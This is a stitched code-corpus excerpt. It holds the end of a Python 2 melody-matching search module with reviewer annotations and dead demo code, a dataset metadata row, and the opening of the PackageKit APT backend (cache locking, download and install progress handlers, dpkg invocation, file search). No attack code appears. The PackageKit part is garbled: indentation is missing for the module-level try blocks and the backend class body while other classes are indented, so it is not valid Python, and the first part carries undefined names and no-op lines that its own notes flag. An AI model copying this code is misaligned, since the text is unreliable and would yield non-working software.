        NOTE(review): when *atarget* is not None the method falls through
        and implicitly returns None -- confirm whether that path is ever
        used.
        """
        if atarget is None:
            btarget = self.targets[-1]
            if len(self.donelist.get(btarget,[]))==0:
                # Target never reached under the error budget: re-run the
                # whole search without a maxerror cutoff.
                #tmp = MyLevenshteinChallenge()
                tmp = self.__class__()
                tmp.maxerror=None
                tmp.maxerrorAtKnownnote={}
                tmp.retondone= btarget
                tmp.targets = self.targets
                tmp.speedtol=self.speedtol
                # for drawing
                tmp.challengestartnote = self.challengestartnote
                tmp.jumpToStates = self.jumpToStates
                tmp.name= "findsolution"
                for v in self.innotes:
                    tmp.add_note(v)
                tmp.update()
                #tmp.draw()
                return (tmp, tmp.donelist[btarget])
            else:
                return (self,self.donelist.get(btarget))
        """
        if atarget is None:
            btarget = self.targets[-1]
            if len(self.donelist.get(btarget,[]))==0:
                #tmp = MyLevenshteinChallenge()
                tmp = self.__class__()
                tmp.maxerror=None
                tmp.maxerrorAtKnownnote={}
                tmp.retondone= btarget
                tmp.fringe = list(self.fringe)
                tmp.targets = self.targets
                tmp.seen = dict(self.seen)
                tmp.nodes = dict(self.nodes)
                tmp.speedtol=self.speedtol
                # for drawing
                tmp.challengestartnote = self.challengestartnote
                tmp.pos=dict(self.pos)
                tmp.drawposdict = dict(self.drawposdict)
                tmp.name= "findsolution"
                tmp.noNextInNoteMappings= NoNextInNoteSet(self.noNextInNoteMappings)
                tmp.NoteMaps = dict(self.NoteMaps)
                for v in self.cut.values():
                    d = self.seen[v]
                    heapq.heappush(tmp.fringe, (d, v))
                tmp.update()
                #tmp.draw()
                return (tmp, tmp.donelist[btarget])
            else:
                return (self,self.donelist.get(btarget))
        """
    def myadd_edge(self, v, w, **dicts):
        """Add an edge between two mapping nodes unless an edge between the
        same (innote.pos, knownChord.pos) pairs already exists.

        NOTE(review): ``self.edges`` is never initialised in this class --
        confirm it comes from incDijkstra.  Also note that ``dicts`` is
        forwarded *positionally* to ``self.add_edge`` -- verify that the
        callee expects a single dict argument rather than keywords.
        """
        Ipos = (v.innote.pos, v.knownChord.pos)
        Kpos = (w.innote.pos, w.knownChord.pos)
        ret = self.edges.get((Ipos, Kpos), None)
        if ret is None:
            ret = self.edges.get((Kpos, Ipos), None)
            if ret is not None:
                self.add_edge(v, w, dicts)
        pass
    def myadd_node(self,anode):
        """Add *anode* to the state graph, deduplicating by ``EqState()``.

        Returns the canonical (cached) node for the state.
        """
        """ bad cause errors are permutating (really?)"""
        """
        # no caching
        # jump creates nodes witch arent optimal and then recached on despite better solutions
        self.G.add_node(anode)
        #self.nodes[anode.EqState()]=anode
        self.pos[anode] = anode.currentMelodyRating.notenextMapping.drawpos(self.drawposdict)
        return anode
        """
        #if anode.currentMelodyRating.errorstr=="jump":
        #    print ""
        #    pass
        # caching state Tree != dist tree
        m1t = self.nodes.get(anode.EqState(),None)
        if m1t is None:
            self.G.add_node(anode)
            self.nodes[anode.EqState()]=anode
            #print "added state to tree"
            m1t = anode
            # NOTE(review): self.pos is not initialised in __init__ --
            # presumably provided by the base class; confirm.
            self.pos[m1t] = m1t.currentMelodyRating.notenextMapping.drawpos(self.drawposdict)
            #logger.info(str(id(m1t)) +" currentMelodyRating.notenextMapping" + str(m1t.currentMelodyRating.notenextMapping.innote.pos))
            #logger.info(str(id(m1t)) +" drawpos " + str(self.pos[m1t]))
        else:
            m1t = self.nodes.get(anode.EqState())
        return m1t
        #"""
    def farestActive(self):
        """Active mapping that has advanced farthest into the known score."""
        if len(self.noNextInNoteMappings.keys())>0:
            return max(self.noNextInNoteMappings.keys(), key = lambda a: a.currentMelodyRating.notenextMapping.knownChord.pos)
        return None
    def longestActive(self):
        """Active mapping with the longest note list."""
        if len(self.noNextInNoteMappings.keys())>0:
            #return max(self.noNextInNoteMappings.keys(), key = lambda a: len(a.list))
            return max(self.noNextInNoteMappings.keys(), key = lambda a: a.lenlist)
        return None
    def bestActive(self):
        """Active mapping ranked best by (cost, length)."""
        if len(self.noNextInNoteMappings.keys())>0:
            #return max(self.noNextInNoteMappings.keys(), key = lambda a: (self.seen[a],len(a.list)))
            return max(self.noNextInNoteMappings.keys(), key = lambda a: (self.seen[a],a.lenlist))
        return None
if __name__ == '__main__':
    # Ad-hoc smoke test of mykey arithmetic.
    # NOTE(review): Python 2 only (print statements throughout this block).
    print "Hallo"
    a=mykey([2,4])
    b=mykey([1,3])
    print a+b
    print a-b
    print mykey([0,0,4])> mykey([0,0])
    print mykey([2,0])> 2
    # NOTE(review): everything below exit(0) is unreachable dead demo code.
    # It also references the undefined name `test` (its creation is commented
    # out below) and `plt`, which is never imported -- it would crash if
    # re-enabled.
    exit(0)
    myLevenstein = MyLevenshteinChallenge()
    G = myLevenstein.G
    # Build a small known melody (K) and a permuted/corrupted played
    # melody (I) as doubly linked MyNote chains.
    midii = [20, 30, 40, 50, 60]
    perm = [2, 3, 1, 4]
    midik = [midii[0]]
    for i in perm:
        midik.append(midii[i])
    #Error
    midik[3] = 55
    #midik.reverse()
    K = []
    I = []
    i = 0
    for x in range(len(midii)):
        a = KnownChordPos()
        ab = myNote.MyNote()
        ab.midi = midii[x]
        ab.myoffset = 100
        ab.last = None
        ab.next = None
        ab.pos = i
        if len(K) > 0:
            ab.last = K[-1]
            K[-1].next = ab
        K.append(ab)
        bb = myNote.MyNote()
        bb.midi = midik[x]
        bb.myoffset = 200
        bb.last = None
        bb.next = None
        bb.pos = i
        #print bb
        if len(I) > 0:
            bb.last = I[-1]
            I[-1].next = bb
        I.append(bb)
        i = i + 1
    s = KnownChordPos()
    s.knownChord = K[0]
    s.innote = I[0]
    print s
    #test= incDijkstra(G,s)
    G.add_node(s)
    #G.add_node("s")
    test.pos[s] = [0, 0]
    # Advance the target one played note at a time and re-run the search.
    for x in I[1:len(I)]:
        print "test.G.nodes ", test.G.nodes()
        print "test.G.edges ", test.G.edges()
        test.target = x
        mytmp = x.next
        # NOTE(review): `x.next = x.next` is a no-op -- probably
        # `x.next = None` (truncate the chain at the target) was intended;
        # confirm before re-enabling.
        x.next = x.next
        print "test.target", test.target.__repr__(), "test.source", test.source.innote.__repr__()
        print test.update()
        x.next = mytmp
    #networkx.draw(G,{s:[10,10],"s":[0,0]})
    networkx.draw(G, test.pos)
    networkx.draw_networkx(G, test.pos)#,with_labels=True, labels= test.elabels)
    networkx.draw_networkx_edge_labels(G, test.pos, edge_labels=test.elabels)
    #networkx.draw_networkx_edge_labels(G, test.pos)
    #networkx.draw_networkx_edge_labels(G)
    plt.show()
    print I
    print K
| olga-weslowskij/olga.weslowskij | Game/myLevenshteinChallenge.py | Python | gpl-2.0 | 14,955 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Provides an apt backend to PackageKit
Copyright (C) 2007 Ali Sabil <ali.sabil@gmail.com>
Copyright (C) 2007 Tom Parker <palfrey@tevp.net>
Copyright (C) 2008-2009 Sebastian Heinlein <glatzor@ubuntu.com>
Copyright (C) 2012 Martin Pitt <martin.pitt@ubuntu.com>
Licensed under the GNU General Public License Version 2
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = "Sebastian Heinlein <devel@glatzor.de>"
import datetime
import errno
import fcntl
import fnmatch
import functools
import gdbm
import glob
import gzip
import locale
import logging
import logging.handlers
import os
import pty
import re
import signal
import socket
import stat
import string
import subprocess
import sys
import time

import apt
import apt.debfile
import apt_pkg
try:
import pkg_resources
except ImportError:
# no plugin support available
pkg_resources = None
from packagekit.backend import (PackageKitBaseBackend, format_string)
from packagekit import enums
logging.basicConfig(format="%(levelname)s:%(message)s")
pklog = logging.getLogger("PackageKitBackend")
pklog.setLevel(logging.NOTSET)
try:
_syslog = logging.handlers.SysLogHandler("/dev/log",
logging.handlers.SysLogHandler.LOG_DAEMON)
formatter = logging.Formatter('PackageKit: %(levelname)s: %(message)s')
_syslog.setFormatter(formatter)
pklog.addHandler(_syslog)
except:
pass
# Xapian database is optionally used to speed up package description search
XAPIAN_DB_PATH = os.environ.get("AXI_DB_PATH", "/var/lib/apt-xapian-index")
XAPIAN_DB = XAPIAN_DB_PATH + "/index"
XAPIAN_DB_VALUES = XAPIAN_DB_PATH + "/values"
XAPIAN_SUPPORT = False
try:
import xapian
except ImportError:
pass
else:
if os.access(XAPIAN_DB, os.R_OK):
pklog.debug("Use XAPIAN for the search")
XAPIAN_SUPPORT = True
# SoftwareProperties is required to proivde information about repositories
try:
import softwareproperties.SoftwareProperties
except ImportError:
REPOS_SUPPORT = False
else:
REPOS_SUPPORT = True
# Check if update-manager-core is installed to get aware of the
# latest distro releases
try:
from UpdateManager.Core.MetaRelease import MetaReleaseCore
except ImportError:
META_RELEASE_SUPPORT = False
else:
META_RELEASE_SUPPORT = True
# Set a timeout for the changelog download
socket.setdefaulttimeout(2)
# Required for daemon mode
os.putenv("PATH",
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")
# Map Debian sections to the PackageKit group name space
SECTION_GROUP_MAP = {
"admin" :enums.GROUP_ADMIN_TOOLS,
"base" :enums.GROUP_SYSTEM,
"comm" :enums.GROUP_COMMUNICATION,
"devel" :enums.GROUP_PROGRAMMING,
"doc" :enums.GROUP_DOCUMENTATION,
"editors" :enums.GROUP_PUBLISHING,
"electronics" :enums.GROUP_ELECTRONICS,
"embedded" :enums.GROUP_SYSTEM,
"games" :enums.GROUP_GAMES,
"gnome" :enums.GROUP_DESKTOP_GNOME,
"graphics" :enums.GROUP_GRAPHICS,
"hamradio" :enums.GROUP_COMMUNICATION,
"interpreters" :enums.GROUP_PROGRAMMING,
"kde" :enums.GROUP_DESKTOP_KDE,
"libdevel" :enums.GROUP_PROGRAMMING,
"libs" :enums.GROUP_SYSTEM,
"mail" :enums.GROUP_INTERNET,
"math" :enums.GROUP_SCIENCE,
"misc" :enums.GROUP_OTHER,
"net" :enums.GROUP_NETWORK,
"news" :enums.GROUP_INTERNET,
"oldlibs" :enums.GROUP_LEGACY,
"otherosfs" :enums.GROUP_SYSTEM,
"perl" :enums.GROUP_PROGRAMMING,
"python" :enums.GROUP_PROGRAMMING,
"science" :enums.GROUP_SCIENCE,
"shells" :enums.GROUP_SYSTEM,
"sound" :enums.GROUP_MULTIMEDIA,
"tex" :enums.GROUP_PUBLISHING,
"text" :enums.GROUP_PUBLISHING,
"utils" :enums.GROUP_ACCESSORIES,
"web" :enums.GROUP_INTERNET,
"x11" :enums.GROUP_DESKTOP_OTHER,
"unknown" :enums.GROUP_UNKNOWN,
"alien" :enums.GROUP_UNKNOWN,
"translations" :enums.GROUP_LOCALIZATION,
"metapackages" :enums.GROUP_COLLECTIONS,
}
# Regular expressions to detect bug numbers in changelogs according to the
# Debian Policy Chapter 4.4. For details see the footnote 16:
# http://www.debian.org/doc/debian-policy/footnotes.html#f16
MATCH_BUG_CLOSES_DEBIAN=r"closes:\s*(?:bug)?\#?\s?\d+(?:,\s*(?:bug)?\#?\s?\d+)*"
MATCH_BUG_NUMBERS=r"\#?\s?(\d+)"
# URL pointing to a bug in the Debian bug tracker
HREF_BUG_DEBIAN="http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%s"
MATCH_BUG_CLOSES_UBUNTU = r"lp:\s+\#\d+(?:,\s*\#\d+)*"
HREF_BUG_UBUNTU = "https://bugs.launchpad.net/bugs/%s"
# Regular expression to find cve references
MATCH_CVE="CVE-\d{4}-\d{4}"
HREF_CVE="http://web.nvd.nist.gov/view/vuln/detail?vulnId=%s"
SYNAPTIC_PIN_FILE = "/var/lib/synaptic/preferences"
# After the given amount of seconds without any updates on the console or
# progress kill the installation (10 minutes).
# The previous value of 10 * 60 * 10000 (~69 days) contradicted the
# "seconds" semantics used in update_interface() and effectively disabled
# the hang detection for stuck maintainer scripts.
TIMEOUT_IDLE_INSTALLATION = 10 * 60
# Required to get translated descriptions
try:
locale.setlocale(locale.LC_ALL, "")
except locale.Error:
pklog.debug("Failed to unset LC_ALL")
# Required to parse RFC822 time stamps
try:
locale.setlocale(locale.LC_TIME, "C")
except locale.Error:
pklog.debug("Failed to unset LC_TIME")
def catch_pkerror(func):
    """Decorator to catch a backend error and report
    it correctly to the daemon.

    The first positional argument of the wrapped callable must be the
    backend instance (``self``), whose ``error()`` method is used for
    reporting.  On success the wrapped function's return value is passed
    through unchanged.
    """
    @functools.wraps(func)  # preserve name/docstring for logging/introspection
    def _catch_error(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except PKError as error:
            backend = args[0]
            backend.error(error.enum, error.msg, error.exit)
    return _catch_error
def lock_cache(func):
    """Lock the system package cache before executing the decorated function
    and release the lock afterwards.

    Blocks (polling every 3 seconds) until both the archive download
    directory lock and the main package system lock can be acquired.  The
    first positional argument of the wrapped callable must be the backend
    instance.  Returns the wrapped function's result.
    """
    @functools.wraps(func)  # preserve name/docstring of the wrapped method
    def _locked_cache(*args, **kwargs):
        backend = args[0]
        backend.status(enums.STATUS_WAITING_FOR_LOCK)
        while True:
            try:
                # see if the lock for the download dir can be acquired
                # (work around bug in python-apt/apps that call _fetchArchives)
                lockfile = apt_pkg.config.find_dir("Dir::Cache::Archives") + \
                           "lock"
                lock = apt_pkg.get_lock(lockfile)
                if lock < 0:
                    raise SystemError("failed to lock '%s'" % lockfile)
                else:
                    os.close(lock)
                # then lock the main package system
                apt_pkg.pkgsystem_lock()
            except SystemError:
                # Somebody else holds a lock: retry after a short sleep.
                time.sleep(3)
            else:
                break
        try:
            # Propagate the wrapped function's return value (it was
            # previously dropped).
            return func(*args, **kwargs)
        finally:
            backend._unlock_cache()
    return _locked_cache
class PKError(Exception):
    """Backend error carrying a PackageKit error enum, a message and a flag
    telling whether the transaction should be aborted (``exit``).
    """

    def __init__(self, enum, msg, exit=True):
        self.enum = enum    # PackageKit error enum (e.g. ERROR_INTERNAL_ERROR)
        self.msg = msg      # human readable details
        self.exit = exit    # abort the transaction when True

    def __str__(self):
        return "{0}: {1}".format(self.enum, self.msg)
class PackageKitOpProgress(apt.progress.base.OpProgress):
    """Handle the cache opening progress.

    Maps APT's repeated 0-100% sub-phase progress onto the sub-range
    [start, end] of the overall transaction, advancing through fixed
    phase boundaries (12%, 25%, 50%, 75%, 100%) on each done() call.
    """
    def __init__(self, backend, start=0, end=100, progress=True):
        self._backend = backend
        apt.progress.base.OpProgress.__init__(self)
        # Pre-compute the absolute progress value at which each sub-phase ends.
        self.steps = []
        for val in [0.12, 0.25, 0.50, 0.75, 1.00]:
            step = start + (end - start) * val
            self.steps.append(step)
        self.pstart = float(start)          # start of the current sub-phase
        self.pend = self.steps.pop(0)       # end of the current sub-phase
        self.pprev = None                   # last emitted progress value
        self.show_progress = progress       # emit percentage signals at all?

    # OpProgress callbacks
    def update(self, percent=None):
        """Map the sub-phase percentage into the overall range and emit it.

        Only forward movement is reported, to avoid flickering progress bars.
        """
        if percent is None:
            return
        progress = int(self.pstart + percent / 100 * (self.pend - self.pstart))
        if self.show_progress and self.pprev < progress:
            self._backend.percentage(progress)
            self.pprev = progress

    def done(self):
        """Advance to the next pre-computed phase boundary."""
        self.pstart = self.pend
        try:
            self.pend = self.steps.pop(0)
        except IndexError:
            # APT performed more sub-phases than we planned boundaries for.
            pklog.warning("An additional step to open the cache is required")
class PackageKitAcquireProgress(apt.progress.base.AcquireProgress):
    """Handle the package download progress.

    TODO: Add a progress for Updating the cache.
    """
    def __init__(self, backend, start=0, end=100):
        self._backend = backend
        apt.progress.base.AcquireProgress.__init__(self)
        self.start_progress = start         # overall range this phase covers
        self.end_progress = end
        self.last_progress = None           # last emitted overall progress
        self.last_sub_progress = None
        self.package_states = {}
        self.media_change_required = None   # (medium, drive) once requested

    def pulse(self, owner):
        """Periodic callback: emit overall and per-worker item progress.

        NOTE(review): raises ZeroDivisionError if total_bytes is 0 -- apt
        normally reports a non-zero total when pulse() fires, but confirm.
        """
        #TODO: port to pulse(owner)
        percent = self.current_bytes * 100.0 / self.total_bytes
        progress = int(self.start_progress + percent / 100 *
                       (self.end_progress - self.start_progress))
        # A backwards running progress is reported as a not available progress
        if self.last_progress > progress:
            self._backend.percentage()
        else:
            self._backend.percentage(progress)
        self.last_progress = progress
        for worker in owner.workers:
            if not worker.current_item or not worker.total_size:
                continue
            item_id = "%s;;;" % worker.current_item.shortdesc
            item_percent = worker.current_size * 100 / worker.total_size
            self._backend.item_progress(item_id, item_percent)
        return True

    def fetch(self, item):
        """Emit a Package signal for an item whose download just started."""
        info = enums.INFO_DOWNLOADING
        try:
            pkg = self._backend._cache[item.shortdesc]
        except KeyError:
            # Not a package known to the cache (e.g. a plain file):
            # emit a bare package id instead.
            self._backend.package("%s;;;" % item.shortdesc, info, "")
        else:
            self._backend._emit_package(pkg, info)

    def start(self):
        """Download phase begins: allow cancelling while fetching."""
        self._backend.status(enums.STATUS_DOWNLOAD)
        self._backend.allow_cancel(True)

    def stop(self):
        """Download phase finished: pin the progress at the range end."""
        self._backend.percentage(self.end_progress)
        self._backend.allow_cancel(False)

    def media_change(self, medium, drive):
        """Ask the daemon for a media change; returning False aborts apt's
        fetch so the transaction can be retried after the swap."""
        #FIXME: Perhaps use gudev to show a nicer drive name
        self._backend.media_change_required(enums.MEDIA_TYPE_DISC, medium,
                                            drive)
        self.media_change_required = medium, drive
        return False
class PackageKitAcquireRepoProgress(PackageKitAcquireProgress):
    """Progress handler used while downloading repository index files."""

    def start(self):
        """Repository refresh begins: report the status, allow cancelling."""
        self._backend.status(enums.STATUS_DOWNLOAD_REPOSITORY)
        self._backend.allow_cancel(True)

    def pulse(self, owner):
        """Index downloads have no meaningful total: report an indeterminate
        percentage and keep the fetcher running."""
        self._backend.percentage(None)
        return True

    def fetch(self, item):
        """Individual index files are not packages -- emit nothing."""
        pass
class PackageKitInstallProgress(apt.progress.base.InstallProgress):
    """Handle the installation and removal process.

    Runs dpkg in a forked pty child, translates APT/dpkg status lines into
    PackageKit Package/ItemProgress signals, and watches for hung
    maintainer scripts.
    """
    def __init__(self, backend, start=0, end=100):
        apt.progress.base.InstallProgress.__init__(self)
        self._backend = backend
        self.pstart = start                 # overall progress range covered
        self.pend = end
        self.pprev = None                   # last emitted overall progress
        self.last_activity = None           # timestamp of last dpkg output
        self.conffile_prompts = set()       # conffiles dpkg asked about
        # insanly long timeout to be able to kill hanging maintainer scripts
        self.start_time = None
        self.output = ""                    # accumulated terminal output
        self.master_fd = None               # pty master connected to dpkg
        self.child_pid = None
        self.last_pkg = None
        self.last_item_percentage = 0       # per-package progress estimate
    def status_change(self, pkg_name, percent, status):
        """Callback for APT status updates."""
        self.last_activity = time.time()
        progress = self.pstart + percent / 100 * (self.pend - self.pstart)
        if self.pprev < progress:
            self._backend.percentage(int(progress))
            self.pprev = progress
        # INSTALL/UPDATE lifecycle (taken from aptcc)
        # - Starts:
        #   - "Running dpkg"
        # - Loops:
        #   - "Installing pkg" (0%)
        #   - "Preparing pkg" (25%)
        #   - "Unpacking pkg" (50%)
        #   - "Preparing to configure pkg" (75%)
        # - Some packages have:
        #   - "Runnung post-installation"
        #   - "Running dpkg"
        # - Loops:
        #   - "Configuring pkg" (0%)
        #   - Sometimes "Configuring pkg" (+25%)
        #   - "Installed pkg"
        # - Afterwards:
        #   - "Running post-installation"
        #
        # REMOVING lifecylce
        # - Starts:
        #   - "Running dpkg"
        # - loops:
        #   - "Removing pkg" (25%)
        #   - "Preparing for removal" (50%)
        #   - "Removing pkg" (75%)
        #   - "Removed pkg" (100%)
        # - Afterwards:
        #   - "Running post-installation"
        # Emit a Package signal for the currently processed package
        if status.startswith("Preparing"):
            item_percentage = self.last_item_percentage + 25
            info = enums.INFO_PREPARING
        elif status.startswith("Installing"):
            item_percentage = 0
            info = enums.INFO_INSTALLING
        elif status.startswith("Installed"):
            item_percentage = 100
            info = enums.INFO_FINISHED
        elif status.startswith("Configuring"):
            if self.last_item_percentage >= 100:
                item_percentage = 0
            # NOTE(review): the assignment below unconditionally overwrites
            # the reset above -- `self.last_item_percentage = 0` was most
            # likely intended in the branch; confirm.
            item_percentage = self.last_item_percentage + 25
            info = enums.INFO_INSTALLING
        elif status.startswith("Removing"):
            item_percentage = self.last_item_percentage + 25
            info = enums.INFO_REMOVING
        elif status.startswith("Removed"):
            item_percentage = 100
            info = enums.INFO_FINISHED
        elif status.startswith("Completely removing"):
            item_percentage = self.last_item_percentage + 25
            info = enums.INFO_REMOVING
        elif status.startswith("Completely removed"):
            item_percentage = 100
            info = enums.INFO_FINISHED
        elif status.startswith("Unpacking"):
            item_percentage = 50
            info = enums.INFO_DECOMPRESSING
        elif status.startswith("Noting disappearance of"):
            item_percentage = self.last_item_percentage
            info = enums.INFO_UNKNOWN
        elif status.startswith("Running"):
            item_percentage = self.last_item_percentage
            info = enums.INFO_CLEANUP
        else:
            item_percentage = self.last_item_percentage
            info = enums.INFO_UNKNOWN
        try:
            pkg = self._backend._cache[pkg_name]
        except KeyError:
            # Emit a fake package
            id = "%s;;;" % pkg_name
            self._backend.package(id, info, "")
            self._backend.item_progress(id, item_percentage)
        else:
            # Always use the candidate - except for removals
            self._backend._emit_package(pkg, info, not pkg.marked_delete)
            if pkg.marked_delete:
                version = pkg.installed
            else:
                version = pkg.candidate
            id = self._backend._get_id_from_version(version)
            self._backend.item_progress(id, item_percentage)
        self.last_pkg = pkg_name
        self.last_item_percentage = item_percentage
    def processing(self, pkg_name, status):
        """Callback for dpkg status updates."""
        if status == "install":
            info = enums.INFO_INSTALLING
        elif status == "configure":
            info = enums.INFO_INSTALLING
        elif status == "remove":
            info = enums.INFO_REMOVING
        elif status == "purge":
            info = enums.INFO_PURGING
        elif status == "disappear":
            info = enums.INFO_CLEANINGUP
        elif status == "upgrade":
            info = enums.INFO_UPDATING
        elif status == "trigproc":
            info = enums.INFO_CLEANINGUP
        else:
            info = enums.INFO_UNKNOWN
        self._backend.package("%s;;;" % pkg_name, info, "")
    def start_update(self):
        """Commit phase begins: release the apt lock so dpkg can take it."""
        # The apt system lock was set by _lock_cache() before
        self._backend._unlock_cache()
        self._backend.status(enums.STATUS_COMMIT)
        self.last_activity = time.time()
        self.start_time = time.time()
    def fork(self):
        """Fork dpkg into a pty child; returns the child pid (0 in child).

        The parent keeps the non-blocking pty master in self.master_fd;
        the child sanitises its environment for non-interactive operation.
        """
        pklog.debug("fork()")
        (pid, self.master_fd) = pty.fork()
        if pid != 0:
            fcntl.fcntl(self.master_fd, fcntl.F_SETFL, os.O_NONBLOCK)
        else:
            def interrupt_handler(signum, frame):
                # Exit the child immediately if we receive the interrupt signal
                # or a Ctrl+C - to avoid that atexit would be called
                os._exit(apt_pkg.PackageManager.RESULT_FAILED)
            # Restore the exception handler to avoid catches by apport
            sys.excepthook = sys.__excepthook__
            signal.signal(signal.SIGINT, interrupt_handler)
            # Avoid questions as far as possible
            os.environ["APT_LISTCHANGES_FRONTEND"] = "none"
            os.environ["APT_LISTBUGS_FRONTEND"] = "none"
            # Check if debconf communication can be piped to the client
            frontend_socket = os.getenv("FRONTEND_SOCKET", None)
            if frontend_socket:
                os.environ["DEBCONF_PIPE"] = frontend_socket
                os.environ["DEBIAN_FRONTEND"] = "passthrough"
            else:
                os.environ["DEBIAN_FRONTEND"] = "noninteractive"
            # Force terminal messages in dpkg to be untranslated, status-fd or
            # debconf prompts won't be affected
            os.environ["DPKG_UNTRANSLATED_MESSAGES"] = "1"
            # We also want untranslated status messages from apt on status-fd
            locale.setlocale(locale.LC_ALL, "C")
        return pid
    def update_interface(self):
        """Pump the dpkg pty output and abort if the installation hangs."""
        apt.progress.base.InstallProgress.update_interface(self)
        # Collect the output from the package manager
        try:
            out = os.read(self.master_fd, 512)
            self.output = self.output + out
            pklog.debug("APT out: %s " % out)
        except OSError:
            # Non-blocking read with no data available.
            pass
        # catch a time out by sending crtl+c
        if self.last_activity + TIMEOUT_IDLE_INSTALLATION < time.time():
            pklog.critical("no activity for %s seconds sending ctrl-c" \
                           % TIMEOUT_IDLE_INSTALLATION)
            # chr(3) is ETX, i.e. Ctrl+C on the child's terminal.
            os.write(self.master_fd, chr(3))
            msg = "Transaction was cancelled since the installation " \
                  "of a package hung.\n" \
                  "This can be caused by maintainer scripts which " \
                  "require input on the terminal:\n%s" % self.output
            raise PKError(enums.ERROR_PACKAGE_FAILED_TO_CONFIGURE,
                          format_string(msg))
    def conffile(self, current, new):
        """Record a conffile prompt; the dpkg --force-conf* options answer it."""
        pklog.warning("Config file prompt: '%s' (sending no)" % current)
        self.conffile_prompts.add(new)
    def error(self, pkg, msg):
        """Translate a dpkg error on *pkg* into a typed PKError and raise it."""
        try:
            pkg = self._backend._cache[pkg]
        except KeyError:
            err_enum = enums.ERROR_TRANSACTION_FAILED
        else:
            if pkg.marked_delete:
                err_enum = enums.ERROR_PACKAGE_FAILED_TO_REMOVE
            elif pkg.marked_keep:
                # Should be called in the case of triggers
                err_enum = enums.ERROR_PACKAGE_FAILED_TO_CONFIGURE
            else:
                err_enum = enums.ERROR_PACKAGE_FAILED_TO_INSTALL
        raise PKError(err_enum, self.output)
    def finish_update(self):
        """Commit finished: report conffile prompts and required reboots."""
        pklog.debug("finishUpdate()")
        if self.conffile_prompts:
            self._backend.message(enums.MESSAGE_CONFIG_FILES_CHANGED,
                                  "The following conffile prompts were found "
                                  "and need investigation: %s" % \
                                  "\n".join(self.conffile_prompts))
        # Check for required restarts
        if os.path.exists("/var/run/reboot-required") and \
           os.path.getmtime("/var/run/reboot-required") > self.start_time:
            self._backend.require_restart(enums.RESTART_SYSTEM, "")
class PackageKitDpkgInstallProgress(PackageKitInstallProgress):
    """Class to initiate and monitor installation of local package
    files with dpkg.
    """
    def recover(self):
        """Run 'dpkg --configure -a'."""
        # NOTE(review): self.writefd is provided by the apt InstallProgress
        # status-fd machinery -- confirm the base class sets it up before
        # recover()/install() are invoked.
        cmd = [apt_pkg.config.find_file("Dir::Bin::Dpkg"),
               "--status-fd", str(self.writefd),
               "--root", apt_pkg.config["Dir"],
               "--force-confdef", "--force-confold"]
        cmd.extend(apt_pkg.config.value_list("Dpkg::Options"))
        cmd.extend(("--configure", "-a"))
        self.run(cmd)
    def install(self, filenames):
        """Install the given package using a dpkg command line call."""
        cmd = [apt_pkg.config.find_file("Dir::Bin::Dpkg"),
               "--force-confdef", "--force-confold",
               "--status-fd", str(self.writefd),
               "--root", apt_pkg.config["Dir"]]
        cmd.extend(apt_pkg.config.value_list("Dpkg::Options"))
        cmd.append("-i")
        cmd.extend([str(f) for f in filenames])
        self.run(cmd)
    def run(self, cmd):
        """Run and monitor a dpkg command line call.

        dpkg's stdin/stdout are attached to a pty slave; the parent reads
        output from the non-blocking master via update_interface().
        """
        pklog.debug("Executing: %s" % cmd)
        (self.master_fd, slave) = pty.openpty()
        fcntl.fcntl(self.master_fd, fcntl.F_SETFL, os.O_NONBLOCK)
        # NOTE(review): the slave fd is never explicitly closed here --
        # confirm whether that is handled elsewhere or a descriptor leak.
        p = subprocess.Popen(cmd, stdout=slave, stdin=slave)
        self.child_pid = p.pid
        res = self.wait_child()
        return res
# Only define the helper when python-software-properties is importable.
if REPOS_SUPPORT:
    class PackageKitSoftwareProperties(softwareproperties.SoftwareProperties.SoftwareProperties):
        """Helper class to work around a silly bug in
        python-software-properties: ensure that a modified sources list is
        actually written back to disk.
        """
        def set_modified_sourceslist(self):
            self.save_sourceslist()
class PackageKitAptBackend(PackageKitBaseBackend):
"""PackageKit backend for APT"""
def __init__(self, cmds=""):
pklog.info("Initializing APT backend")
signal.signal(signal.SIGQUIT, self._sigquit)
self._cache = None
self._last_cache_refresh = None
apt_pkg.init_config()
apt_pkg.config.set("DPkg::Options::", '--force-confdef')
apt_pkg.config.set("DPkg::Options::", '--force-confold')
PackageKitBaseBackend.__init__(self, cmds)
self._init_plugins()
# Methods ( client -> engine -> backend )
@catch_pkerror
def search_file(self, filters, filenames):
    """Search for files in packages.

    Works only for installed files if apt-file isn't installed.
    """
    pklog.info("Searching for file: %s" % filenames)
    self.status(enums.STATUS_QUERY)
    self.percentage(None)
    self._check_init(progress=False)
    self.allow_cancel(True)
    result_names = set()
    # Optionally make use of apt-file's Contents cache to search for not
    # installed files. But still search for installed files additionally
    # to make sure that we provide up-to-date results
    if (os.path.exists("/usr/bin/apt-file") and
            enums.FILTER_INSTALLED not in filters):
        #FIXME: Make use of rapt-file on Debian if the network is available
        #FIXME: Show a warning to the user if the apt-file cache is several
        #       weeks old
        pklog.debug("Using apt-file")
        filenames_regex = []
        for filename in filenames:
            # apt-file Contents entries carry no leading slash, hence the
            # [1:] for absolute paths; bare names are anchored at a
            # path separator
            if filename.startswith("/"):
                pattern = "^%s$" % filename[1:].replace("/", "\/")
            else:
                pattern = "\/%s$" % filename
            filenames_regex.append(pattern)
        cmd = ["/usr/bin/apt-file", "--regexp", "--non-interactive",
               "--package-only", "find", "|".join(filenames_regex)]
        pklog.debug("Calling: %s" % cmd)
        apt_file = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE)
        stdout, stderr = apt_file.communicate()
        if apt_file.returncode == 0:
            #FIXME: Actually we should check if the file is part of the
            #       candidate, e.g. if unstable and experimental are
            #       enabled and a file would only be part of the
            #       experimental version
            result_names.update(stdout.split())
            self._emit_visible_packages_by_name(filters, result_names)
        else:
            raise PKError(enums.ERROR_INTERNAL_ERROR,
                          format_string("%s %s" % (stdout, stderr)))
    # Search for installed files
    filenames_regex = []
    for filename in filenames:
        # installed_files paths keep the leading slash, so no [1:] here
        if filename.startswith("/"):
            pattern = "^%s$" % filename.replace("/", "\/")
        else:
            pattern = ".*\/%s$" % filename
        filenames_regex.append(pattern)
    files_pattern = re.compile("|".join(filenames_regex))
    for pkg in self._cache:
